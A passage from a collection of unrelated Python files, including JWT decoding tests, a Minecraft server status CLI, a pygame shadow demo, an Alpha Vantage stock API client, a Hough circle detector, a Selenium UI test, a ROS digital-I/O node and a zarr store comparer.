b'"iat": "1454935765",'
b'"exp": "1454935765",'
b'"exp": "2075297148"}')
jwt = jwtio_header + "." + payload.decode() + "." + jwtio_signature
self.assert_in_decode_signed_jwt_exception(jwt, "InvalidJWSSignature")
def assert_in_decode_signed_jwt_exception(self, jwe, error):
with pytest.raises(InvalidTokenException) as ite:
JWTHelper.decode(jwe, self.key_store, purpose=KEY_PURPOSE_AUTHENTICATION, check_claims=self.CHECK_CLAIMS)
# Looks weird, but ite.value is an exception object. The error message is contained in the 'value' attribute
# of that object.
if error not in ite.value.value:
raise AssertionError(
'"{}" not found in decode exception. Actual exception message [{}]'.format(error, ite.value.value))
def test_encode_with_dict_and_string(self):
claims_as_dict = {
'data': [
{
'string': 'something',
'boolean': True,
'number': 10,
'decimal': 10.1,
'null': None
}
]
}
claims_as_string = json.dumps(claims_as_dict)
string_token = JWTHelper.encode(claims=claims_as_string, kid='EQ_USER_AUTHENTICATION_EQ_KEY',
key_store=self.key_store, purpose=KEY_PURPOSE_AUTHENTICATION)
dict_token = JWTHelper.encode(claims=claims_as_dict, kid='EQ_USER_AUTHENTICATION_EQ_KEY',
key_store=self.key_store, purpose=KEY_PURPOSE_AUTHENTICATION)
string_token_decode = JWTHelper.decode(jwt_token=string_token, key_store=self.key_store_secondary,
purpose=KEY_PURPOSE_AUTHENTICATION)
dict_token_decode = JWTHelper.decode(jwt_token=dict_token, key_store=self.key_store_secondary,
purpose=KEY_PURPOSE_AUTHENTICATION)
assert string_token_decode == dict_token_decode
|
import re

# Credit-card format: starts with 4/5/6, four groups of 4 digits, optionally
# separated by a single consistent '-' (the \1 backreference enforces consistency).
CARD_RE = re.compile(r'[456]\d{3}(-?)\d{4}\1\d{4}\1\d{4}')
# Four or more identical consecutive digits (checked with separators removed).
REPEAT_RE = re.compile(r'(\d)\1{3}')

for _ in range(int(input())):
    card = input()
    is_valid = CARD_RE.fullmatch(card) and not REPEAT_RE.search(card.replace('-', ''))
    print("Valid" if is_valid else "Invalid")
|
import click
from .. import MinecraftServer
# Module-level server handle; set by the `cli` group callback before any subcommand runs.
server = None
@click.group(context_settings=dict(help_option_names=['-h', '--help']))
@click.argument("address")
# NOTE: the docstring below is rendered verbatim by click as the CLI help text
# (\b disables paragraph rewrapping) — do not edit it casually.
def cli(address):
    """
    mcstatus provides an easy way to query Minecraft servers for
    any information they can expose. It provides three modes of
    access: query, status, and ping.
    Examples:
    \b
    $ mcstatus example.org ping
    21.120ms
    \b
    $ mcstatus example.org:1234 ping
    159.903ms
    \b
    $ mcstatus example.org status
    version: v1.8.8 (protocol 47)
    description: "A Minecraft Server"
    players: 1/20 ['Dinnerbone (61699b2e-d327-4a01-9f1e-0ea8c3f06bc6)']
    \b
    $ mcstatus example.org query
    host: 93.148.216.34:25565
    software: v1.8.8 vanilla
    plugins: []
    motd: "A Minecraft Server"
    players: 1/20 ['Dinnerbone (61699b2e-d327-4a01-9f1e-0ea8c3f06bc6)']
    """
    # Resolve the address once and share it with the subcommands via the module global.
    global server
    server = MinecraftServer.lookup(address)
@cli.command(short_help="prints server latency")
def ping():
    """
    Ping server for latency.
    """
    latency = server.ping()
    click.echo("{}ms".format(latency))
@cli.command(short_help="basic server information")
def status():
    """
    Prints server status. Supported by all Minecraft
    servers that are version 1.7 or higher.
    """
    response = server.status()
    click.echo("version: v{} (protocol {})".format(response.version.name, response.version.protocol))
    click.echo("description: \"{}\"".format(response.description))
    # The sample of online players may be absent (None) when nobody is online.
    sample = response.players.sample
    if sample is not None:
        player_display = ["{} ({})".format(player.name, player.id) for player in sample]
    else:
        player_display = "No players online"
    click.echo("players: {}/{} {}".format(response.players.online, response.players.max, player_display))
@cli.command(short_help="detailed server information")
def query():
    """
    Prints detailed server information. Must be enabled in
    servers' server.properties file.
    """
    response = server.query()
    lines = [
        "host: {}:{}".format(response.raw['hostip'], response.raw['hostport']),
        "software: v{} {}".format(response.software.version, response.software.brand),
        "plugins: {}".format(response.software.plugins),
        "motd: \"{}\"".format(response.motd),
        "players: {}/{} {}".format(response.players.online, response.players.max, response.players.names),
    ]
    for line in lines:
        click.echo(line)
# Allow running the CLI directly (python -m / script execution).
if __name__ == "__main__":
    cli()
|
#!/usr/bin/env python
# -*- coding: UTF-8 -*-
# Copyright (C) 2011 Rodrigo Pinheiro Marques de Araujo
#
# This program is free software; you can redistribute it and/or modify it under
# the terms of the GNU General Public License as published by the Free Software
# Foundation; either version 2 of the License, or (at your option) any later
# version.
#
# This program is distributed in the hope that it will be useful, but WITHOUT
# ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
# FOR A PARTICULAR PURPOSE. See the GNU General Public License for more
# details.
#
# You should have received a copy of the GNU General Public License along with
# this program; if not, write to the Free Software Foundation, Inc., 51
# Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.
#
import sys
import socket
import logging
# Unix-domain socket path shared with the perfectresume daemon.
SOCKET_FILE="/tmp/.perfectresume"
LOG_FILE = SOCKET_FILE + ".client.log"
# Handshake payload the daemon expects before it replies 'ok'.
MAGIC_NUMBER = '42'
logging.basicConfig(filename=LOG_FILE,level=logging.DEBUG,
        format="%(asctime)s - %(levelname)s - %(message)s")
def main():
    """Notify the perfectresume daemon when a 'resume'/'thaw' power event fires.

    Exits 0 when the daemon answers 'ok', 1 on any failure. The event name is
    expected in sys.argv[1] (pm-utils style hook arguments).
    """
    logging.info("params " + " ".join(sys.argv))
    if len(sys.argv) < 2:
        # Called without an event argument: nothing to do, but fail loudly in the log.
        logging.error("no power event argument supplied")
        sys.exit(1)
    if sys.argv[1] == "resume" or sys.argv[1] == "thaw":
        logging.info("sending message")
        s = None
        try:
            s = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
            s.connect(SOCKET_FILE)
            s.send(MAGIC_NUMBER)
            data = s.recv(1024)
            if data == 'ok':
                logging.info("message is ok")
                sys.exit(0)
            else:
                logging.error("data is " + data)
                sys.exit(1)
        except Exception:
            logging.exception("error")
            sys.exit(1)
        finally:
            # Guard: socket creation itself may have failed, leaving `s` unset
            # (the original unconditionally called s.close() -> NameError).
            if s is not None:
                s.close()
# Script entry point (invoked as a suspend/resume hook).
if __name__ == "__main__":
    main()
|
from sys import stdout
def show_progress(counter, max_num):
    """Render an in-place progress line like 'thinking...(3/10)' on stdout.

    :param counter: zero-based progress index (displayed one-based)
    :param max_num: total number of steps
    """
    stdout.write("\rthinking...(%d/%d)" % (counter+1, max_num))
    # Flush AFTER writing so the freshly written text is actually displayed;
    # the original flushed before the write, leaving the newest text buffered.
    stdout.flush()
def fin_progress():
    """Terminate the in-place progress line with a carriage return + newline."""
    line_ending = "\r\n"
    stdout.write(line_ending)
|
# Shadows
import pygame, projections3D, structures_3D
size = 1000
class World(projections3D.Projection):
    """A projection space that can also cast floor shadows for its objects."""
    def __init__(self, width, height, background=(255, 255, 255), floor=None):
        super(World, self).__init__(width, height)
        self.background = background
        # Plane the shadows are projected onto; None disables shadow casting.
        self.floor = floor
    def project_all_shadows(self):
        """Project the shadow of every shadow-carrying object onto the floor."""
        for thing in self.objects.values():
            # Not every stored object necessarily carries a `shadow` attribute
            # (plain structures_3D.Object instances don't); guard with getattr
            # instead of crashing with AttributeError.
            if getattr(thing, 'shadow', None):
                thing.shadow.project_on_surface(self.floor)
    def run(self):
        """Create a pygame screen until it is closed."""
        key_to_function = {
            pygame.K_LEFT: (lambda x: x.rotateAll('Y', -0.1)),
            pygame.K_RIGHT: (lambda x: x.rotateAll('Y', 0.1)),
            pygame.K_UP: (lambda x: x.rotateAll('X', -0.1)),
            pygame.K_DOWN: (lambda x: x.rotateAll('X', 0.1)),
            pygame.K_q: (lambda x: x.rotateAll('Z', -0.1)),
            pygame.K_e: (lambda x: x.rotateAll('Z', 0.1)),
            pygame.K_d: (lambda x: x.move_all('x', 10)),
            pygame.K_a: (lambda x: x.move_all('x', -10)),
            pygame.K_s: (lambda x: x.move_all('y', 10)),
            pygame.K_w: (lambda x: x.move_all('y', -10)),
            pygame.K_LSHIFT: (lambda x: x.scaleAll(1.25)),
            pygame.K_LCTRL: (lambda x: x.scaleAll( 0.8))
        }
        done = False
        while not done:
            keys = pygame.key.get_pressed()
            for key in key_to_function.keys():
                if keys[key]:
                    key_to_function[key](self)
            for event in pygame.event.get():
                if event.type == pygame.KEYDOWN:
                    if event.key == pygame.K_ESCAPE:
                        done = True
            # `is not None` instead of `!= None` (identity check for the sentinel).
            if self.floor is not None:
                self.project_all_shadows()
            pygame.time.delay(100)
            self.display()
            pygame.display.flip()
        pygame.quit()
        return done
    def display(self):
        """ Draw the objects on the screen. """
        self.screen.fill(self.background)
        for thing in self.objects.values():
            for edge in thing.edges:
                pygame.draw.aaline(self.screen, thing.edge_color, (edge.start.x, edge.start.y), (edge.end.x, edge.end.y), 1)
            for node in thing.nodes:
                pygame.draw.circle(self.screen, thing.node_color, (int(node.x), int(node.y)), self.nodeRadius, 0)
            # Only draw shadow nodes for objects that actually have a shadow
            # (the original crashed on shadow-less objects).
            shadow = getattr(thing, 'shadow', None)
            if shadow:
                for node in shadow.nodes:
                    pygame.draw.circle(self.screen, shadow.color, (int(node.x), int(node.y)), self.nodeRadius, 0)
class Mat_object(structures_3D.Object):
    """structures_3D.Object that optionally carries a floor shadow."""
    def __init__(self, nodes=None, edges=None, node_color=(0,0,0), edge_color=(125,125,125), shadow=True):
        # Avoid shared mutable default arguments: fresh lists per instance.
        nodes = [] if nodes is None else nodes
        edges = [] if edges is None else edges
        # Forward the caller's colors (the original discarded them and
        # re-passed the hard-coded literals to super()).
        super(Mat_object, self).__init__(nodes, edges, node_color=node_color, edge_color=edge_color)
        # Always define the attribute so consumers can safely test `if obj.shadow:`
        # (the original left it undefined when shadow=False).
        self.shadow = Shadow(self, (0, 0, 0)) if shadow else None
class Shadow(object):
    """docstring for Shadow."""
    def __init__(self, thing, shadow_color=(0, 0, 0)):
        """Given the object initializes its shadow"""
        # First i will have the second object being a static flat floor
        super(Shadow, self).__init__()
        self.thing = thing
        self.color = shadow_color
        self.shadow = structures_3D.Object([], [], shadow_color)
        # Projected node positions, refreshed by project_on_surface().
        self.nodes = []
    def project_on_surface(self, surface, plain=True):
        """Given a surface"""
        self.nodes = []
        if plain:
            for node in self.thing.nodes:
                # Find the foot of the perpendicular from `node` onto plane `surface`
                # using the line (x, y, z) = (node.x, node.y, node.z) + lambda*(n.x, n.y, n.z).
                # NOTE(review): assumes `surface` exposes `normal` (x, y, z) and the
                # plane offset `d` of ax+by+cz+d=0 — confirm against structures_3D.Plane.
                l = (- surface.normal.x*node.x - surface.normal.y*node.y - surface.normal.z*node.z - surface.d)/(surface.normal.x**2 + surface.normal.y**2 + surface.normal.z**2)
                self.nodes.append(structures_3D.Node(node.x+surface.normal.x*l, node.y+surface.normal.y*l, node.z+surface.normal.z*l))
# Build a demo world with a horizontal floor plane at y = 500.
world = World(size, size, (255, 255, 255), structures_3D.Plane(equation="0x +y +0z -500")) # structures_3D.Plane(equation="x+0+z=0")
# Cube corners at every combination of 0/50 on each axis; the edge index
# arithmetic below depends on this exact comprehension ordering (z fastest).
cube_nodes = [structures_3D.Node(x, y, z) for x in (0, 50) for y in (0, 50) for z in (0, 50)]
# for node in cube_nodes:
#     print("x: {0} y: {1} z: {2}".format(node.x, node.y, node.z))
# Connect nodes differing in exactly one coordinate: +4 flips x, +1 flips z, +2 flips y.
edges = [(cube_nodes[n],cube_nodes[n+4]) for n in range(0,4)] + [(cube_nodes[n],cube_nodes[n+1]) for n in range(0,8,2)] + [(cube_nodes[n],cube_nodes[n+2]) for n in (0,1,4,5)]
cube_edges = []
for edge in edges:
    cube_edges.append(structures_3D.Edge(edge[0], edge[1]))
cube = Mat_object(cube_nodes, cube_edges)
world.add_object("cube", cube)
world.run()
|
import re
import asyncio
import aiohttp
import requests
class APIHandler:
    """Thin client around the Alpha Vantage REST API.

    Synchronous endpoints use `requests`; multi-request endpoints fan out
    concurrently with aiohttp/asyncio and retry on client errors (the free
    API tier rate-limits aggressively).
    """
    def __init__(self, api_key):
        # Alpha Vantage API key appended to every request URL.
        self.api_key = api_key
        self.base_query_url = 'https://www.alphavantage.co/query'
    async def fetch_data(self, session, url):
        """
        Retrieve json data from a given url through API
        :param session: aiohttp Client session
        :param url: a url where to request data
        :return: a response data in json format
        """
        result = None
        # NOTE(review): retries forever on ClientError (assumed to be
        # rate-limiting); a permanently failing URL would loop indefinitely.
        while not result:
            try:
                async with session.get(url) as res:
                    res.raise_for_status()
                    result = await res.json()
            except aiohttp.ClientError as error:
                print(f'Exceed max requests, so sleep a little '
                      f'and try again for {url}')
                print(error)
                # sleep a little and try again
                await asyncio.sleep(2)
        return result
    async def check_and_fetch_all(self, urls, loop):
        """Fetch every URL concurrently within a single aiohttp session."""
        async with aiohttp.ClientSession(loop=loop) as session:
            results = await asyncio.gather(
                *[self.fetch_data(session, url)
                  for url in urls],
                return_exceptions=True)
        return results
    @staticmethod
    def clean_dict(data_dict):
        """
        Optimize the key name of each item in a given data_dict
        :param data_dict: a dict data to optimize
        :return: an optimized dict data
        """
        # Alpha Vantage keys look like "1. symbol"; strip the numeric prefix.
        return {
            re.sub(r'\d+.', '', j).strip(): v for j, v in data_dict.items()
        }
    def get_details_by_keyword(self, keyword):
        """
        Get a list of symbols with additional details based on the given
        keyword from alphavantage through API
        :param keyword: a symbol to find matching data
        :return: a list of symbols with additional details
        """
        api_url = f"{self.base_query_url}?function=SYMBOL_SEARCH" \
                  f"&keywords={keyword}&apikey={self.api_key}"
        response = requests.get(api_url)
        if not response.ok:
            print('Failed to get matching symbols through API.')
            return []
        matches = [self.clean_dict(i) for i in response.json()['bestMatches']]
        return matches
    def get_time_series_by_symbol(self, symbol, functions):
        """
        Get time series of given functions through API
        :param symbol: a symbol name literally
        :param functions: a list of functions. e.x. TIME_SERIES_MONTHLY
        """
        api_urls = []
        response_list = []
        for func in functions:
            if func == 'TIME_SERIES_INTRADAY':
                # Intraday requires an explicit interval parameter.
                interval = '15min'
                url = f"{self.base_query_url}?" \
                      f"function={func}" \
                      f"&symbol={symbol}" \
                      f"&interval={interval}" \
                      f"&apikey={self.api_key}"
            else:
                url = f"{self.base_query_url}?" \
                      f"function={func}" \
                      f"&symbol={symbol}" \
                      f"&apikey={self.api_key}"
            api_urls.append(url)
        loop = asyncio.get_event_loop()
        response_list += loop.run_until_complete(
            self.check_and_fetch_all(api_urls, loop))
        result_list = []
        for response in response_list:
            # Last top-level key holds the actual series (first is metadata).
            result = {'title': [*response.keys()][-1]}
            table = [
                [i, *v.values()]
                for i, v in response[result['title']].items()
            ]
            result['table'] = table
            result['columns'] = ['datetime', 'open', 'high',
                                 'low', 'close', 'volume']
            result_list.append(result)
        return result_list
    def get_quote_by_symbol(self, symbol, func):
        """
        Get the current quote of a given symbol
        :param symbol: a symbol name literally
        :param func: the name of the function. e.x. GLOBAL_QUOTE
        """
        api_url = f"{self.base_query_url}?function={func}" \
                  f"&symbol={symbol}&apikey={self.api_key}"
        response = requests.get(api_url)
        if not response.ok:
            print('Failed to get the current quote of a symbol through API.')
            return []
        data = self.clean_dict(response.json()['Global Quote'])
        return data
    def get_technical_indicators_by_symbol(self,
                                           symbol,
                                           functions,
                                           interval='weekly',
                                           time_period='10',
                                           series_type='open'):
        """
        Get technical indicators of given functions through API
        :param symbol: a symbol name literally
        :param functions: a list of functions. e.x. EMA, SMA
        :param interval: time interval between two consecutive data points
        in the time series
        :param time_period: number of data points used to
        calculate each moving average value
        :param series_type: the desired price type in the time series
        """
        api_urls = []
        response_list = []
        for func in functions:
            url = f"{self.base_query_url}?" \
                  f"function={func}" \
                  f"&symbol={symbol}" \
                  f"&interval={interval}" \
                  f"&time_period={time_period}" \
                  f"&series_type={series_type}" \
                  f"&apikey={self.api_key}"
            api_urls.append(url)
        loop = asyncio.get_event_loop()
        response_list += loop.run_until_complete(
            self.check_and_fetch_all(api_urls, loop))
        result_list = []
        try:
            for response in response_list:
                result = {'title': [*response.keys()][-1]}
                table = [
                    [i, *v.values()]
                    for i, v in response[result['title']].items()
                ]
                result['table'] = table
                result['columns'] = ['datetime', result['title'].split(':')[-1].strip()]
                result_list.append(result)
        except Exception as error:
            # Pass this exception error for now because the error comes up
            # due to the limited number of requests.
            pass
        return result_list
|
import numpy as np
import cv2
def houghTransform(edged,x0,x1,y0,y1):
    """Brute-force Hough circle detection inside the window [x0,x1) x [y0,y1).

    Relies on module-level globals: `radii` (candidate radii), `accu` (vote
    accumulator indexed [a][b][rIdx]) and `img` (image circles are drawn on).
    NOTE(review): candidate centers are only searched inside the same window
    as the edge pixels, and the circle equation is tested with exact integer
    equality — both assumed intentional for this exercise.
    """
    maxVote = 0
    # loop the region and find the edge pixel
    for x in range(x0,x1):
        for y in range(y0,y1):
            if edged[y,x] > 0:
                # vote for every (center a,b / radius r) passing through (x,y)
                for a in range(x0,x1):
                    for b in range(y0,y1):
                        for rIdx in range (len(radii)):
                            # if the a,b,r satisfies the circle's equation,the accumulator
                            # is incremented by 1
                            if((x - a)**2 + (y - b)**2 == (radii[rIdx])**2):
                                accu[a][b][rIdx] += 1
    # find the local largest numberof vote and draw the circle (a,b,r)
    # a,b is the position of the center, and r is the radius of the circle
    for x2 in range(x0,x1) :
        for y2 in range(y0,y1):
            for rIdx1 in range(len(radii)):
                if(accu[x2,y2,rIdx1] > maxVote):
                    cX = x2
                    cY = y2
                    cR = radii[rIdx1]
                    maxVote = accu[x2,y2,rIdx1]
    # only draw when the best candidate gathered more than 3 votes
    if maxVote > 3:
        cv2.circle(img, (cX,cY),cR,255,1)
if __name__ == "__main__":
    # Load grayscale, smooth, then auto-threshold Canny around the median.
    img = cv2.imread('Houghcircles.jpg',0)
    blur = cv2.GaussianBlur(img,(3,3),1)
    v = np.median(blur)
    # apply automatic Canny edge detection using the computed median
    lower = int(max(0, (1.0 - 0.43) * v))
    upper = int(min(255, (1.0 + 0.43) * v))
    edged = cv2.Canny(blur, lower, upper)
    # Globals consumed by houghTransform (best-circle state and accumulator).
    cX=0
    cY=0
    cR = 0
    h,w = edged.shape
    radii = range(20,60,2)
    accu = np.zeros((w,h,len(radii)))
    # One hand-picked window per expected circle to keep the O(n^4) vote tractable.
    houghTransform(edged,450,600,1,400) #10th
    houghTransform(edged,0,300,0,100)# First circle
    houghTransform(edged,100,240,100,240)# Second
    houghTransform(edged,0,140,240,340) # Third
    houghTransform(edged,240,320,100,180) #Forth
    houghTransform(edged,160,240,280,360) # 5th
    houghTransform(edged,232,340,240,360) #6th
    houghTransform(edged,340,460,40,150) #7th
    houghTransform(edged,340,460,170,280) #8th
    houghTransform(edged,360,460,300,390) #9th
    cv2.imshow('result1',img)
    cv2.imwrite('myhough.jpg',img)
    cv2.waitKey(0)
    cv2.destroyAllWindows()
|
import pygame
from pygame import font
class Button():
    """A simple centred, labelled button rendered with pygame."""
    def __init__(self,alien_setting,screen,msg):
        # Initialise the button's attributes.
        self.screen = screen
        self.screenRect = screen.get_rect()
        # Button dimensions, colours and default font.
        self.width,self.height = 200,50
        self.buttonColor = (0,255,0)
        self.textColor = (255,255,255)
        self.font = font.SysFont(None,48)
        # Build the button's rect object and centre it on the screen.
        self.rect = pygame.Rect(0,0,self.width,self.height)
        self.rect.center = self.screenRect.center
        # The button label only needs to be rendered once.
        self.prepMsg(msg)
    def prepMsg(self,msg):
        """Render `msg` as an image and centre it on the button."""
        self.msgImage = self.font.render(msg,True,self.textColor,self.buttonColor)
        self.msgImageRect = self.msgImage.get_rect()
        self.msgImageRect.center = self.rect.center
    def drawButton(self):
        # Fill the button area, then blit the pre-rendered label on top.
        self.screen.fill(self.buttonColor,self.rect)
        self.screen.blit(self.msgImage,self.msgImageRect)
|
#input
# 27
# 90 17
# 67 76
# 21 22
# 28 66
# 58 33
# 47 25
# 40 48
# 22 21
# 11 15
# 57 64
# 65 76
# 38 36
# 88 19
# 70 25
# 52 27
# 77 51
# 34 53
# 37 46
# 66 56
# 21 34
# 79 59
# 50 29
# 17 62
# 41 18
# 68 88
# 73 42
# 73 20
def chance_for_a_to_win(pa, pb):
    """Probability that A (shooting first) wins, via a truncated geometric series.

    Sums the first 99 rounds; the tiny epsilon is kept from the original to
    preserve its downstream rounding behaviour.
    """
    both_miss = (1 - pa) * (1 - pb)
    return sum(both_miss ** (round_no - 1) * pa for round_no in range(1, 100)) + 1e-7
# or
def chance_for_a_to_win2(pa, pb):
    """Closed form of the geometric series: P(A wins) = pa / (1 - (1-pa)(1-pb)).

    Guards the pa == pb == 0 edge case, where nobody can ever hit and the
    original raised ZeroDivisionError; A's winning probability is then 0.
    """
    both_miss = (1 - pa) * (1 - pb)
    if both_miss == 1:
        return 0.0
    return pa / (1 - both_miss)
def main():
    """Read n probability pairs (percent) and print A's rounded win chance for each."""
    num_cases = int(input())
    for _ in range(num_cases):
        pa_pct, pb_pct = (int(token) for token in input().split())
        win_chance = chance_for_a_to_win2(pa_pct / 100, pb_pct / 100)
        print(round(win_chance * 100), end=' ')
# Script entry point.
if __name__ == '__main__':
    main()
"""
Author: Sidhin S Thomas (sidhin@trymake.com)
Copyright (c) 2017 Sibibia Technologies Pvt Ltd
All Rights Reserved
Unauthorized copying of this file, via any medium is strictly prohibited
Proprietary and confidential
""" |
import time
from selenium import webdriver
from selenium.webdriver.common.by import By
from selenium.webdriver.support.ui import WebDriverWait
from selenium.webdriver.support import expected_conditions as EC
from selenium.webdriver.common.action_chains import ActionChains
from Home_Work_python.Learn_python3.Home_Work_10_selenium.custome_wait import presence_of_elements
dr = webdriver.Chrome(executable_path=r"/Users/fabric/PycharmProjects/chromedriver")
dr.get('http://localhost:8888/oxwall/')
wait = WebDriverWait(dr, 10)
# --- log the user in ---
# frame_element = dr.find_element(By.NAME, "demobody")
# dr.switch_to.frame(frame_element)
sing_in = wait.until(EC.visibility_of_element_located((By.CLASS_NAME, 'ow_signin_label')))
sing_in.click()
dr.find_element(By.CSS_SELECTOR, '.ow_user_name input').send_keys('fabric')
dr.find_element(By.CSS_SELECTOR, '.ow_password input').send_keys('pass')
dr.find_element(By.NAME, 'submit').click()
# --- count newsfeed posts before publishing ---
count_of_post = len(dr.find_elements(By.CLASS_NAME, 'ow_newsfeed_item'))
print(count_of_post)
# --- write a comment ---
comment_field = wait.until(EC.visibility_of_element_located((By.CSS_SELECTOR, '.ow_smallmargin textarea')))
comment_field.send_keys("test comment123")
# BUGFIX: By.CLASS_NAME accepts a single class name only; a compound
# "class descendant" expression needs a CSS selector.
dr.find_element(By.CSS_SELECTOR, '.ow_attachment_btn input').click()
# custom_wait: the newsfeed must grow beyond the previous post count
results = wait.until(presence_of_elements((By.CLASS_NAME, "ow_newsfeed_item"), count_of_post), message="Less than ")
print("Count After = ", len(results))
assert len(results) == count_of_post + 1
# --- add a post with a photo ---
dr.find_element(By.CSS_SELECTOR, '.ow_smallmargin textarea').click()
dr.find_element(By.CSS_SELECTOR, "input.mlt_file_input").send_keys('/Users/fabric/oxwall.jpg')
wait.until(EC.invisibility_of_element((By.CSS_SELECTOR, "a.ow_photo_attachment_pic.ow_attachment_preload.loading")))
# BUGFIX: same compound-selector issue as above.
dr.find_element(By.CSS_SELECTOR, '.ow_attachment_btn input').click()
time.sleep(2)
# --- log the user out via the hover dropdown ---
button_sign_out = dr.find_element(By.CSS_SELECTOR, '.ow_console_item.ow_console_dropdown.ow_console_dropdown_hover')
action = ActionChains(dr)
action.move_to_element(button_sign_out)
action.perform()
button_log_out = dr.find_element(By.XPATH, "//li[7]/div/a")
button_log_out.click()
dr.close()
|
"""
Modifique as funções que foram cridas no desafio 107 para que elas aceitem
um parâmetro a mais, informando se o valor retornado por elas vai ser ou não
formatado pela função moeda(), desenvolvida no desafio 108.
"""
from df109_moeda import moeda
price = float(input('Price: R$'))
print(f'The double of {moeda.moeda(price)} is {moeda.double(price, True)}')
print(f'The half of {moeda.moeda(price)} is {moeda.half(price, True)}')
print(f'The plus of 10% of {moeda.moeda(price)} is {moeda.plus(price, 10, False)}')
print(f'The decrease of 40% of {moeda.moeda(price)} is {moeda.decrease(price, 40, True)}')
|
# -*- coding: UTF-8 -*-
import sys
import re
import time
def wordCount(file_in):
    """Count word frequencies in `file_in` and write "word\t:\tcount" lines to 'result'.

    Words are whitespace-separated runs left over after replacing everything
    that is not a letter, space or apostrophe with a space.
    """
    # time.clock was removed in Python 3.8; fall back to time.time there.
    timer = getattr(time, 'clock', None) or time.time
    source = open(file_in, 'r')
    file_out = open('result', 'w')
    try:
        words = {}
        tic = timer()
        for line in source:
            line = re.sub('[^(a-zA-Z)+\ \']+', " ", line)
            for word in line.split():
                # dict.get avoids the original's O(n) `word in words.keys()` scan
                words[word] = words.get(word, 0) + 1
        toc = timer()
        print("time it takes is: " + str(toc - tic))
        for word in words:
            file_out.write(word + "\t:\t" + str(words[word]) + '\n')
    finally:
        # Close files even if counting fails (the original leaked them on error).
        source.close()
        file_out.close()
# Default to the bundled 'dubliners' text when no filename is given.
if __name__ == "__main__":
    if len(sys.argv) == 1:
        file_in = 'dubliners'
    else:
        file_in = sys.argv[1]
    wordCount(file_in)
|
#!/usr/bin/env python
import rospy
import itertools
from robotnik_msgs.srv import set_digital_output, set_digital_outputRequest, set_named_digital_output, set_named_digital_outputResponse
from robotnik_msgs.msg import inputs_outputs, named_input_output, named_inputs_outputs
class NamedIO():
    """Maps human-readable names onto robotnik_modbus_io digital I/O.

    Re-publishes the raw input topic under configured names and exposes a
    service to set outputs by name.
    """
    def __init__(self):
        # named input definitions, loaded from the 'inputs' ROS param in setup()
        self._i_dict = {}
        # named output definitions, loaded from the 'outputs' ROS param in setup()
        self._o_dict = {}
        # publisher with the named view of the raw I/O state
        self._pub = rospy.Publisher('~named_inputs_outputs', named_inputs_outputs, queue_size=1)
        # proxy to the low-level modbus write service
        self._write_digital_output = rospy.ServiceProxy('robotnik_modbus_io/write_digital_output', set_digital_output)
    def get_digital_output_number(self, req):
        '''
        Returns the output and value if the name exists
        '''
        # BUGFIX: the original always fell through to `return output, value`
        # (returning 0/False for unknown names), leaving the warning and the
        # `return None, None` unreachable — so missing names were silently
        # written to output 0. Return early only for known names.
        if req.name in self._o_dict:
            output = self._o_dict[req.name][0]['number']
            value = req.value
            return output, value
        rospy.logwarn(req.name + " not exists")
        return None, None
    def inputs_callback(self, data):
        '''
        Publish the input data through a topic
        '''
        msg = named_inputs_outputs()
        msg.digital_inputs = []
        for key in self._i_dict:
            named_io = named_input_output()
            named_io.name = key
            # configured numbers are 1-based; the topic array is 0-based
            named_io.value = data.digital_inputs[self._i_dict[key][0]['number'] - 1]
            msg.digital_inputs.append(named_io)
        self._pub.publish(msg)
    def set_named_digital_output_callback(self, req):
        '''
        NamedIO service. It gets the number and the output value, then calls
        to a service from robotnik_modbus_io.
        '''
        response = set_named_digital_outputResponse()
        response.ret = True
        # set the correct information
        out, value = self.get_digital_output_number(req)
        if out is None:
            response.ret = False
        else:
            # Call the modbus_io service
            srv_response = self.set_digital_output(out, value)
            if not srv_response:
                response.ret = False
        return response
    def set_digital_output(self, output, value):
        '''
        Function that writes the info received into the write_digital_output service
        '''
        rospy.wait_for_service('robotnik_modbus_io/write_digital_output')
        try:
            request = set_digital_outputRequest()
            request.output = output
            request.value = value
            response = self._write_digital_output(request)
            return response
        except rospy.ServiceException:
            rospy.logerr('write_digital_output service call failed')
            return False
    def setup(self):
        # Set up the params, service server and topic subscription.
        self._o_dict = rospy.get_param('outputs')
        self._i_dict = rospy.get_param('inputs')
        service = rospy.Service('named_io/set_named_digital_output', set_named_digital_output, self.set_named_digital_output_callback)
        rospy.Subscriber("robotnik_modbus_io/input_output", inputs_outputs, self.inputs_callback)
# ROS node entry point: configure the named I/O bridge and spin forever.
if __name__ == '__main__':
    rospy.init_node('named_io_node')
    mb = NamedIO()
    mb.setup()
    rospy.spin()
|
from collections.abc import MutableMapping
import json
class StoreComparer(MutableMapping):
    """
    Compare two store implementations, and make sure to do the same operation on both stores.

    The operations on the first store are always taken as the reference; the
    comparer checks that the second store returns the same value, or raises
    the same exception type, for every operation.

    This should have minimal impact on API, but some generators are reified
    and sorted to make sure they are identical.
    """

    def __init__(self, reference, tested):
        self.reference = reference
        self.tested = tested

    def __getitem__(self, key):
        """Read from both stores and assert they agree; return the reference value."""
        try:
            k1 = self.reference[key]
        except Exception as e1:
            # Reference raised: the tested store must raise the same type.
            # BUGFIX: the original re-raised unconditionally, leaving the
            # isinstance comparison below as dead code, and the AssertionError
            # message lacked its f-prefix (printed literal braces).
            try:
                k2 = self.tested[key]
            except Exception as e2:
                if not isinstance(e2, type(e1)):
                    raise AssertionError(f"Expecting {type(e1)} got {type(e2)}") from e2
                raise
            raise AssertionError(f"should raise, got {k2} for {key}")
        k2 = self.tested[key]
        if key.endswith((".zgroup", ".zarray")):
            # JSON metadata may differ in formatting; compare parsed content.
            j1, j2 = json.loads(k1.decode()), json.loads(k2.decode())
            assert j1 == j2, f"{j1} != {j2}"
        else:
            assert k2 == k1, f"{k1} != {k2}"
        return k1

    def __setitem__(self, key, value):
        """Write to both stores, asserting identical success/failure behaviour."""
        # todo : not quite happy about casting here, maybe we should stay strict ?
        from numcodecs.compat import ensure_bytes
        ensure_bytes(value)  # early validation only; both stores get the raw value
        try:
            self.reference[key] = value
        except Exception as e1:
            # Reference raised: tested must raise the same exception type.
            # BUGFIX: the original wrote to the tested store twice on this path
            # and had dead code after a bare `raise`.
            try:
                self.tested[key] = value
                assert False, f"should raise, reference raised {e1}"
            except AssertionError:
                raise
            except Exception as e2:
                assert isinstance(e2, type(e1))
                raise
        # Reference succeeded: the tested store must accept the write as well.
        self.tested[key] = value

    def keys(self):
        """Sorted, reified key list, asserted identical across both stores."""
        try:
            k1 = list(sorted(self.reference.keys()))
